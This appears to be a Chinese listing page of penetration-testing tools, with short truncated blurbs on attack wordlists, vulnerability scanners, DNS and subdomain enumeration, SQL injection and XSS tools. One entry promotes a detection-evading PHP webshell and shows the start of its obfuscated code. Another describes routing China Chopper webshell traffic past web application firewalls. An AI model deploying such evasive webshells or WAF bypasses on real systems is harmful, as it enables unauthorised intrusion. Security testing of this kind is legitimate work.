SaiDict渗透测试字典该项目维护者收藏了弱口令，敏感目录，敏感文件等渗透测试常用攻击字典。用于项目的安全审计与安全检测。渗透测试字典项目目前字典的目录大概分布如下：账户字典|-常用弱密码|-常用账户名|-中国人名拼音|-常用手机号fuzz字典|-LDAP注入|-SQL注入|-XSS攻击|-文件遍历|-XXE|-vul(各种中间件目录)中间件弱口令|-axis弱口令|-tomcat账户|-tom…

RapidScan漏洞扫描器以往进行安全检测时我们都需要一个接一个的运行安全扫描/审计工具，来收集信息以便进一步修复安全漏洞。但这样做效率太低了，能否实现自动化呢？即运行多个扫描工具来发现漏洞并合为一体，有效地判断误报，相互关联结果并节省宝贵的时间，RapidScan就是这样一款漏洞扫描器。RapidScan漏洞扫描器-帮助RapidScan漏洞扫描器-扫描RapidScan漏洞扫描器-输出报告功…

Gitrob是一个Github潜在敏感信息泄漏扫描工具。Gitrob将属于用户或组织的存储库克隆到可配置的深度，并遍历提交历史记录/标记与潜在敏感文件的签名匹配的文件。调查结果将通过网络界面呈现，以便于浏览和分析。界面GitHub敏感信息泄漏扫描WebUI中的评估统计信息和结果查看发现，突出显示问题点二进制文件支持hexdump视图Gitrob使用1gitrob[参数]target[target…

WeebDNSDNS枚举工具weebdns是一个使用Python3编写的异步DNS枚举工具，用于测试目的，只能用于的严格授权的测试范围。它比普通工具快得多。DNS枚举工具依赖Python 3.xpip3gitPYTHON3依赖aiohttpasyncioaiodnsWeebDNS安装与使用Ubuntu/debian系统依赖安装1$sudoapt-getinstallgitpython3p…

NetSet介绍NetSet旨在自动执行多个操作，以帮助用户保护网络流量。它还提供了一种通过Tor收集代理和运行实用程序的简便方法。NetSet安装和使用的也是自动配置，该工具主要用于辅助性网络安全任务。实现了一种按需使用的终端多路复用器，它的会话通过Tor路由网关。通过自动安装和配置DNSCrypt-proxy来保护DNS流量。TorWall功能强制所有流量通过Tor网络。轻松访问在线OPSEC…

免杀PHP一句话过最新D盾等，webshell变量随机，增加流量传输编码方式免杀webshellPHP一句话 classLTDS{publicfunction__destruct(){$bxo='X'^"\x39";$woa='?'^"\x4c";$ukt='K'^"\x38";$gud='d'^"\x1";$fbu='_'^"\x2d";$agx='

超级SQL注入工具介绍超级SQL注入工具（SSQLInjection）是一款基于HTTP协议自组包的SQL注入工具，工具采用C#开发，直接操作TCP会话来进行Socket发包与HTTP交互，极大的提升了发包效率，相比C#自带的HttpWebRequest速度提升2-5倍。支持出现在HTTP协议任意位置的SQL注入，支持各种类型的SQL注入。超级SQL注入工具支持注入类型HTTP协议任意位置的SQL…

CaidaoMitmProxy基于HTTP代理中转中国菜刀过WAF,基于菜刀20160622版本修改和测试。理论上是支持低版本菜刀。本人没测试希望大家来帮忙测试下。安装pip[3]installpydespip[3]installmitmproxy使用替换caidao.conf文件(使用PHPDES加密脚本的时候才需要替换)将支持DES加密的 Webshell 上传到服务器的W…

XSpearXSS扫描器XSpear是一款基于RubyGems的的XSS漏洞扫描器。拥有常见的XSS漏洞扫描攻击测试功能。还可进行参数分析。​XSS漏洞扫描器主要特点基于模式匹配的XSS扫描检测alert confirm prompt无头浏览器上的事件（使用Selenium）测试XSS保护旁路和反射参数的请求/响应反射的参数过滤测试 eventhandler …

OneForAll简介在渗透测试中信息收集的重要性不言而喻，子域名收集是信息收集中必不可少且非常重要的一环，目前网上也开源了许多子域收集的工具，但是总是存在以下部分问题：不够强大，子域收集的接口不够多，不能做到对批量子域自动收集，没有自动子域解析，验证，FUZZ以及信息拓展等功能。不够友好，固然命令行模块比较方便，但是当可选的参数很多，要实现的操作复杂，用命令行模式就有点不够友好，如果有交互良好，…